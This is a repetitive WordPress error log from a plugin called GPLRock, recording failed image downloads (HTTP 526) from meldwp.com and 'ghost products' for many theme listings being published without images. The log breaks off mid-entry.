[05-Apr-2026 02:49:57 UTC] GPLRock: Image download failed for product organic-food-nutritionist-farm-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:49:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/organic-food---nutritionist--farm-wordpress-theme-19721.webp for product organic-food-nutritionist-farm-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:49:59 UTC] GPLRock WARNING: Image download failed for product organic-food-nutritionist-farm-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/organic-food---nutritionist--farm-wordpress-theme-19721.webp [05-Apr-2026 02:49:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: organic-food-nutritionist-farm-wordpress-theme [05-Apr-2026 02:49:59 UTC] GPLRock: Image download failed for product construction-building-renovation-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:50:01 UTC] GPLRock: Image download failed for product construction-building-renovation-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:50:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/construction---building--renovation-wordpress-theme-30555.webp for product construction-building-renovation-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:50:04 UTC] GPLRock: Image download failed for product construction-building-renovation-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:50:06 UTC] GPLRock: Image download failed for product construction-building-renovation-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:50:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/construction---building--renovation-wordpress-theme-30555.webp for product construction-building-renovation-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:50:08 UTC] GPLRock WARNING: Image download failed for product construction-building-renovation-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/construction---building--renovation-wordpress-theme-30555.webp [05-Apr-2026 02:50:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: construction-building-renovation-wordpress-theme [05-Apr-2026 02:50:08 UTC] GPLRock: Image download failed for product kozi-elementor-fashion-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:50:10 UTC] GPLRock: Image download failed for product kozi-elementor-fashion-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:50:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kozi---elementor-fashion-store-wordpress-theme-4068.webp for product kozi-elementor-fashion-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:50:12 UTC] GPLRock: Image download failed for product kozi-elementor-fashion-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:50:14 UTC] GPLRock: Image download failed for product kozi-elementor-fashion-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:50:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kozi---elementor-fashion-store-wordpress-theme-4068.webp for product kozi-elementor-fashion-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:50:16 UTC] GPLRock WARNING: Image download failed for product kozi-elementor-fashion-store-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/kozi---elementor-fashion-store-wordpress-theme-4068.webp [05-Apr-2026 02:50:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: kozi-elementor-fashion-store-wordpress-theme [05-Apr-2026 02:50:17 UTC] GPLRock: Image download failed for product mitti-home-decor-crafts-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:50:19 UTC] GPLRock: Image download failed for product mitti-home-decor-crafts-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:50:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mitti---home-decor--crafts---woocommerce-theme-30609.webp for product mitti-home-decor-crafts-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:50:21 UTC] GPLRock: Image download failed for product mitti-home-decor-crafts-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:50:23 UTC] GPLRock: Image download failed for product mitti-home-decor-crafts-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:50:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mitti---home-decor--crafts---woocommerce-theme-30609.webp for product mitti-home-decor-crafts-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:50:25 UTC] GPLRock WARNING: Image download failed for product mitti-home-decor-crafts-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/mitti---home-decor--crafts---woocommerce-theme-30609.webp [05-Apr-2026 02:50:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mitti-home-decor-crafts-woocommerce-theme [05-Apr-2026 02:50:25 UTC] GPLRock: Image download failed for product motormania-motorcycle-accessories-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:50:27 UTC] GPLRock: Image download failed for product motormania-motorcycle-accessories-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:50:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/motormania--motorcycle-accessories-woocommerce-theme-30117.webp for product motormania-motorcycle-accessories-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:50:30 UTC] GPLRock: Image download failed for product motormania-motorcycle-accessories-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:50:32 UTC] GPLRock: Image download failed for product motormania-motorcycle-accessories-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:50:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/motormania--motorcycle-accessories-woocommerce-theme-30117.webp for product motormania-motorcycle-accessories-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:50:34 UTC] GPLRock WARNING: Image download failed for product motormania-motorcycle-accessories-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/motormania--motorcycle-accessories-woocommerce-theme-30117.webp [05-Apr-2026 02:50:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: motormania-motorcycle-accessories-woocommerce-theme [05-Apr-2026 02:50:34 UTC] GPLRock: Image download failed for product dietitian-nutrition-health-professionals-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:50:36 UTC] GPLRock: Image download failed for product dietitian-nutrition-health-professionals-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:50:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dietitian---nutrition-health-professionals-wordpress-theme-3186.webp for product dietitian-nutrition-health-professionals-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:50:38 UTC] GPLRock: Image download failed for product dietitian-nutrition-health-professionals-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:50:40 UTC] GPLRock: Image download failed for product dietitian-nutrition-health-professionals-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:50:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dietitian---nutrition-health-professionals-wordpress-theme-3186.webp for product dietitian-nutrition-health-professionals-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:50:42 UTC] GPLRock WARNING: Image download failed for product dietitian-nutrition-health-professionals-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/dietitian---nutrition-health-professionals-wordpress-theme-3186.webp [05-Apr-2026 02:50:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: dietitian-nutrition-health-professionals-wordpress-theme [05-Apr-2026 02:50:43 UTC] GPLRock: Image download failed for product axsis-app-landing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:50:45 UTC] GPLRock: Image download failed for product axsis-app-landing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:50:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/axsis---app-landing-wordpress-theme-30973.webp for product axsis-app-landing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:50:47 UTC] GPLRock: Image download failed for product axsis-app-landing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:50:49 UTC] GPLRock: Image download failed for product axsis-app-landing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:50:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/axsis---app-landing-wordpress-theme-30973.webp for product axsis-app-landing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:50:51 UTC] GPLRock WARNING: Image download failed for product axsis-app-landing-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/axsis---app-landing-wordpress-theme-30973.webp [05-Apr-2026 02:50:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: axsis-app-landing-wordpress-theme [05-Apr-2026 02:50:51 UTC] GPLRock: Image download failed for product topika-insurance-company-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:50:53 UTC] GPLRock: Image download failed for product topika-insurance-company-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:50:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/topika---insurance-company-wordpress-theme-19313.webp for product topika-insurance-company-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:50:55 UTC] GPLRock: Image download failed for product topika-insurance-company-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:50:58 UTC] GPLRock: Image download failed for product topika-insurance-company-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:51:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/topika---insurance-company-wordpress-theme-19313.webp for product topika-insurance-company-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:51:00 UTC] GPLRock WARNING: Image download failed for product topika-insurance-company-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/topika---insurance-company-wordpress-theme-19313.webp [05-Apr-2026 02:51:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: topika-insurance-company-wordpress-theme [05-Apr-2026 02:51:00 UTC] GPLRock: Image download failed for product quincy-business-consulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:51:02 UTC] GPLRock: Image download failed for product quincy-business-consulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:51:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/quincy---business-consulting-wordpress-theme-22115.webp for product quincy-business-consulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:51:04 UTC] GPLRock: Image download failed for product quincy-business-consulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:51:06 UTC] GPLRock: Image download failed for product quincy-business-consulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:51:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/quincy---business-consulting-wordpress-theme-22115.webp for product quincy-business-consulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:51:08 UTC] GPLRock WARNING: Image download failed for product quincy-business-consulting-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/quincy---business-consulting-wordpress-theme-22115.webp [05-Apr-2026 02:51:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: quincy-business-consulting-wordpress-theme [05-Apr-2026 02:51:08 UTC] GPLRock: Image download failed for product eidan-creative-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:51:11 UTC] GPLRock: Image download failed for product eidan-creative-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:51:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eidan---creative-agency-wordpress-theme-32325.webp for product eidan-creative-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:51:13 UTC] GPLRock: Image download failed for product eidan-creative-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:51:15 UTC] GPLRock: Image download failed for product eidan-creative-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:51:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eidan---creative-agency-wordpress-theme-32325.webp for product eidan-creative-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:51:17 UTC] GPLRock WARNING: Image download failed for product eidan-creative-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/eidan---creative-agency-wordpress-theme-32325.webp [05-Apr-2026 02:51:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: eidan-creative-agency-wordpress-theme [05-Apr-2026 02:51:31 UTC] GPLRock: Image download failed for product inpulse-creative-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:51:34 UTC] GPLRock: Image download failed for product inpulse-creative-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:51:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/inpulse---creative-agency-wordpress-theme-21439.webp for product inpulse-creative-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:51:36 UTC] GPLRock: Image download failed for product inpulse-creative-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:51:38 UTC] GPLRock: Image download failed for product inpulse-creative-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:51:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/inpulse---creative-agency-wordpress-theme-21439.webp for product inpulse-creative-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:51:40 UTC] GPLRock WARNING: Image download failed for product inpulse-creative-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/inpulse---creative-agency-wordpress-theme-21439.webp [05-Apr-2026 02:51:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: inpulse-creative-agency-wordpress-theme [05-Apr-2026 02:51:40 UTC] GPLRock: Image download failed for product signflow-tech-and-startup-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:51:42 UTC] GPLRock: Image download failed for product signflow-tech-and-startup-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:51:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/signflow---tech-and-startup-theme-18330.webp for product signflow-tech-and-startup-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:51:44 UTC] GPLRock: Image download failed for product signflow-tech-and-startup-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:51:46 UTC] GPLRock: Image download failed for product signflow-tech-and-startup-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:51:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/signflow---tech-and-startup-theme-18330.webp for product signflow-tech-and-startup-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:51:48 UTC] GPLRock WARNING: Image download failed for product signflow-tech-and-startup-theme. URL: https://meldwp.com/wp-content/uploads/signflow---tech-and-startup-theme-18330.webp [05-Apr-2026 02:51:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: signflow-tech-and-startup-theme [05-Apr-2026 02:51:49 UTC] GPLRock: Image download failed for product listingeasy-directory-listing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:51:51 UTC] GPLRock: Image download failed for product listingeasy-directory-listing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:51:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/listingeasy---directory-listing-wordpress-theme-16574.webp for product listingeasy-directory-listing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:51:53 UTC] GPLRock: Image download failed for product listingeasy-directory-listing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:51:55 UTC] GPLRock: Image download failed for product listingeasy-directory-listing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:51:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/listingeasy---directory-listing-wordpress-theme-16574.webp for product listingeasy-directory-listing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:51:57 UTC] GPLRock WARNING: Image download failed for product listingeasy-directory-listing-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/listingeasy---directory-listing-wordpress-theme-16574.webp [05-Apr-2026 02:51:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: listingeasy-directory-listing-wordpress-theme [05-Apr-2026 02:51:57 UTC] GPLRock: Image downloaded successfully for product dulce-a-tumblr-style-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1cced3ec.webp [05-Apr-2026 02:51:57 UTC] GPLRock: Using pre-downloaded image for product dulce-a-tumblr-style-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1cced3ec.webp [05-Apr-2026 02:51:57 UTC] GPLRock: Ghost product published with image - Product ID: dulce-a-tumblr-style-wordpress-theme [05-Apr-2026 02:51:57 UTC] GPLRock: Image download failed for product aethos-creative-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:51:59 UTC] GPLRock: Image download failed for product aethos-creative-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:52:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/aethos---creative-agency-wordpress-theme-10557.webp for product aethos-creative-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:52:02 UTC] GPLRock: Image download failed for product aethos-creative-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:52:04 UTC] GPLRock: Image download failed for product aethos-creative-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:52:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/aethos---creative-agency-wordpress-theme-10557.webp for product aethos-creative-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:52:06 UTC] GPLRock WARNING: Image download failed for product aethos-creative-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/aethos---creative-agency-wordpress-theme-10557.webp [05-Apr-2026 02:52:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: aethos-creative-agency-wordpress-theme [05-Apr-2026 02:52:06 UTC] GPLRock: Image download failed for product sam-bailey-personal-cvresume-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:52:08 UTC] GPLRock: Image download failed for product sam-bailey-personal-cvresume-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:52:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sam-bailey---personal-cvresume-wordpress-theme-7124.webp for product sam-bailey-personal-cvresume-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:52:11 UTC] GPLRock: Image download failed for product sam-bailey-personal-cvresume-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:52:13 UTC] GPLRock: Image download failed for product sam-bailey-personal-cvresume-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:52:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sam-bailey---personal-cvresume-wordpress-theme-7124.webp for product sam-bailey-personal-cvresume-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:52:15 UTC] GPLRock WARNING: Image download failed for product sam-bailey-personal-cvresume-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/sam-bailey---personal-cvresume-wordpress-theme-7124.webp [05-Apr-2026 02:52:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sam-bailey-personal-cvresume-wordpress-theme [05-Apr-2026 02:52:15 UTC] GPLRock: Image download failed for product alpas-ai-data-analytics-startup-elementor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:52:17 UTC] GPLRock: Image download failed for product alpas-ai-data-analytics-startup-elementor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:52:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/alpas---ai--data-analytics-startup-elementor-wordpress-theme-18144.webp for product alpas-ai-data-analytics-startup-elementor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:52:19 UTC] GPLRock: Image download failed for product alpas-ai-data-analytics-startup-elementor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:52:21 UTC] GPLRock: Image download failed for product alpas-ai-data-analytics-startup-elementor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:52:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/alpas---ai--data-analytics-startup-elementor-wordpress-theme-18144.webp for product alpas-ai-data-analytics-startup-elementor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:52:23 UTC] GPLRock WARNING: Image download failed for product alpas-ai-data-analytics-startup-elementor-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/alpas---ai--data-analytics-startup-elementor-wordpress-theme-18144.webp [05-Apr-2026 02:52:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: alpas-ai-data-analytics-startup-elementor-wordpress-theme [05-Apr-2026 02:52:24 UTC] GPLRock: Image download failed for product maxazine-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:52:26 UTC] GPLRock: Image download failed for product maxazine-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:52:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/maxazine--magazine-wordpress-theme-31277.webp for product maxazine-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:52:28 UTC] GPLRock: Image download failed for product maxazine-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:52:30 UTC] GPLRock: Image download failed for product maxazine-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:52:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/maxazine--magazine-wordpress-theme-31277.webp for product maxazine-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:52:32 UTC] GPLRock WARNING: Image download failed for product maxazine-magazine-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/maxazine--magazine-wordpress-theme-31277.webp [05-Apr-2026 02:52:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: maxazine-magazine-wordpress-theme [05-Apr-2026 02:52:32 UTC] GPLRock: Image download failed for product ac-services-air-conditioning-and-heating-company-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:52:34 UTC] GPLRock: Image download failed for product ac-services-air-conditioning-and-heating-company-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:52:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ac-services--air-conditioning-and-heating-company-wordpress-theme-3360.webp for product ac-services-air-conditioning-and-heating-company-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:52:36 UTC] GPLRock: Image download failed for product ac-services-air-conditioning-and-heating-company-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:52:39 UTC] GPLRock: Image download failed for product ac-services-air-conditioning-and-heating-company-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:52:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ac-services--air-conditioning-and-heating-company-wordpress-theme-3360.webp for product ac-services-air-conditioning-and-heating-company-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:52:41 UTC] GPLRock WARNING: Image download failed for product ac-services-air-conditioning-and-heating-company-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/ac-services--air-conditioning-and-heating-company-wordpress-theme-3360.webp [05-Apr-2026 02:52:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ac-services-air-conditioning-and-heating-company-wordpress-theme [05-Apr-2026 02:52:41 UTC] GPLRock: Image download failed for product lamira-furniture-cosmetics-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:52:43 UTC] GPLRock: Image download failed for product lamira-furniture-cosmetics-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:52:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lamira---furniture--cosmetics-woocommerce-theme-9935.webp for product lamira-furniture-cosmetics-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:52:45 UTC] GPLRock: Image download failed for product lamira-furniture-cosmetics-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:52:47 UTC] GPLRock: Image download failed for product lamira-furniture-cosmetics-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:52:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lamira---furniture--cosmetics-woocommerce-theme-9935.webp for product lamira-furniture-cosmetics-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:52:49 UTC] GPLRock WARNING: Image download failed for product lamira-furniture-cosmetics-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/lamira---furniture--cosmetics-woocommerce-theme-9935.webp [05-Apr-2026 02:52:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: lamira-furniture-cosmetics-woocommerce-theme [05-Apr-2026 02:54:01 UTC] GPLRock: Image download failed for product scroll-magic-animation-builder-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:54:03 UTC] GPLRock: Image download failed for product scroll-magic-animation-builder-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:54:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/scroll-magic--animation-builder-wordpress-plugin-5658.webp for product scroll-magic-animation-builder-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:54:05 UTC] GPLRock: Image download failed for product scroll-magic-animation-builder-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:54:07 UTC] GPLRock: Image download failed for product scroll-magic-animation-builder-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:54:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/scroll-magic--animation-builder-wordpress-plugin-5658.webp for product scroll-magic-animation-builder-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:54:09 UTC] GPLRock WARNING: Image download failed for product scroll-magic-animation-builder-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/scroll-magic--animation-builder-wordpress-plugin-5658.webp [05-Apr-2026 02:54:10 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: scroll-magic-animation-builder-wordpress-plugin [05-Apr-2026 02:54:10 UTC] GPLRock: Image download failed for product glider-3d-photo-slider-wordpress-plugin-v110 (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:54:12 UTC] GPLRock: Image download failed for product glider-3d-photo-slider-wordpress-plugin-v110 (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:54:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/glider-3d-photo-slider-wordpress-plugin-v110-20169.webp for product glider-3d-photo-slider-wordpress-plugin-v110 after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:54:15 UTC] GPLRock: 